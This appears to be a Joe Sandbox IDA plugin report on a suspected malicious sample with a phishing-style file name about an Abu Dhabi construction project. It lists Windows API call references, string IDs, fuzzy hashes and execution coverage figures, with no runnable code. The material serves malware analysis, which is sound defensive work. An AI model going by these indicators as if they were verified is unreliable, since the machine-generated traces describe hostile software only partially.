                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2754987064-0
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 00402FD7
                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                                                          • strlen.MSVCRT ref: 00403006
                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2754987064-0
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                                            • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                                            • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                                          • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                                          • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                                          • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                                          Similarity
                                                                                                                          • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 764393265-0
                                                                                                                          APIs
                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                                          • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                                          Similarity
                                                                                                                          • API ID: Time$System$File$LocalSpecific
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 979780441-0
                                                                                                                          APIs
                                                                                                                          • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                                                          • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                                          • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy$DialogHandleModuleParam
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1386444988-0
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                                                          • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: InvalidateMessageRectSend
                                                                                                                          • String ID: d=E
                                                                                                                          • API String ID: 909852535-3703654223
                                                                                                                          APIs
                                                                                                                          • wcschr.MSVCRT ref: 0040F79E
                                                                                                                          • wcschr.MSVCRT ref: 0040F7AC
                                                                                                                            • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                                            • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4), ref: 0040AACB
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: wcschr$memcpywcslen
                                                                                                                          • String ID: "
                                                                                                                          • API String ID: 1983396471-123907689
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                          • _memicmp.MSVCRT ref: 0040C00D
                                                                                                                          • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: FilePointer_memicmpmemcpy
                                                                                                                          • String ID: URL
                                                                                                                          • API String ID: 2108176848-3574463123
                                                                                                                          APIs
                                                                                                                          • _snwprintf.MSVCRT ref: 0040A398
                                                                                                                          • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _snwprintfmemcpy
                                                                                                                          • String ID: %2.2X
                                                                                                                          • API String ID: 2789212964-323797159
                                                                                                                          • Opcode ID: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                                                                                          • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                                          • Opcode Fuzzy Hash: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                                                                                          • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _snwprintf
                                                                                                                          • String ID: %%-%d.%ds
                                                                                                                          • API String ID: 3988819677-2008345750
                                                                                                                          • Opcode ID: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                                                                                          • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                                                          • Opcode Fuzzy Hash: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                                                                                          • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                                                          APIs
                                                                                                                          • GetWindowPlacement.USER32(?,?,?,?,?,00411B7F,?,General,?,00000000,00000001), ref: 00401904
                                                                                                                          • memset.MSVCRT ref: 00401917
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: PlacementWindowmemset
                                                                                                                          • String ID: WinPos
                                                                                                                          • API String ID: 4036792311-2823255486
                                                                                                                          • Opcode ID: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                                                                                          • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                                                          • Opcode Fuzzy Hash: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                                                                                          • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                                          • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                                                          • wcscat.MSVCRT ref: 0040DCFF
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                          • String ID: _lng.ini
                                                                                                                          • API String ID: 383090722-1948609170
                                                                                                                          • Opcode ID: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                                                                                          • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                                                          • Opcode Fuzzy Hash: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                                                                                          • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                          • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                                                          • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                          • API String ID: 2773794195-880857682
                                                                                                                          • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                                                          • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                                                          • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                                                          • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                                                          APIs
                                                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 0040A159
                                                                                                                          • SetWindowLongW.USER32(000000EC,000000EC,00000000), ref: 0040A16B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: LongWindow
                                                                                                                          • String ID: MZ@
                                                                                                                          • API String ID: 1378638983-2978689999
                                                                                                                          • Opcode ID: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                                                                                          • Instruction ID: 658df1d6f65a5f4ca5cf2dc917bfbc57e2b12ac14a328fb0c2cac09aa770bd9f
                                                                                                                          • Opcode Fuzzy Hash: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                                                                                          • Instruction Fuzzy Hash: 3FC0027415D116AFDF112B35EC0AE2A7EA9BB86362F208BB4B076E01F1CB7184109A09
                                                                                                                          APIs
                                                                                                                          • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                                                          • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                                                          • memset.MSVCRT ref: 0042BAAE
                                                                                                                          • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy$memset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 438689982-0
                                                                                                                          • Opcode ID: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                                                                                          • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                                                          • Opcode Fuzzy Hash: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                                                                                          • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ??2@$memset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1860491036-0
                                                                                                                          • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                          • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                                                          • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                          • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                                                          APIs
                                                                                                                          • wcslen.MSVCRT ref: 0040A8E2
                                                                                                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                            • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                                            • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                          • free.MSVCRT ref: 0040A908
                                                                                                                          • free.MSVCRT ref: 0040A92B
                                                                                                                          • memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: free$memcpy$mallocwcslen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 726966127-0
                                                                                                                          • Opcode ID: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                                                                                                          • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                                                          • Opcode Fuzzy Hash: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                                                                                                          • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                                                          APIs
                                                                                                                          • wcslen.MSVCRT ref: 0040B1DE
                                                                                                                          • free.MSVCRT ref: 0040B201
                                                                                                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                            • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                                            • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                          • free.MSVCRT ref: 0040B224
                                                                                                                          • memcpy.MSVCRT(00000000,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: free$memcpy$mallocwcslen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 726966127-0
                                                                                                                          • Opcode ID: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                                                                                                          • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                                          • Opcode Fuzzy Hash: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                                                                                                          • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                                          APIs
                                                                                                                          • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                                                                                            • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                                                                                            • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                                                                            • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                                                                          • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                                                                                          • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                                                                                          • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcmp$memcpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 231171946-0
                                                                                                                          • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                          • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                                                          • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                          • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                                                          APIs
                                                                                                                          • strlen.MSVCRT ref: 0040B0D8
                                                                                                                          • free.MSVCRT ref: 0040B0FB
                                                                                                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                            • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                                            • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                          • free.MSVCRT ref: 0040B12C
                                                                                                                          • memcpy.MSVCRT(00000000,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: free$memcpy$mallocstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3669619086-0
                                                                                                                          • Opcode ID: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                                                                                                          • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                                          • Opcode Fuzzy Hash: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                                                                                                          • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                                          APIs
                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                                          • malloc.MSVCRT ref: 00417407
                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                                          • free.MSVCRT ref: 00417425
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharMultiWide$freemalloc
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2605342592-0
                                                                                                                          • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                                          • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                                          • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                                          • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: wcslen$wcscat$wcscpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1961120804-0
                                                                                                                          • Opcode ID: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                                                                                          • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                                                          • Opcode Fuzzy Hash: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                                                                                          • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:2.4%
                                                                                                                          Dynamic/Decrypted Code Coverage:20%
                                                                                                                          Signature Coverage:0.5%
                                                                                                                          Total number of Nodes:867
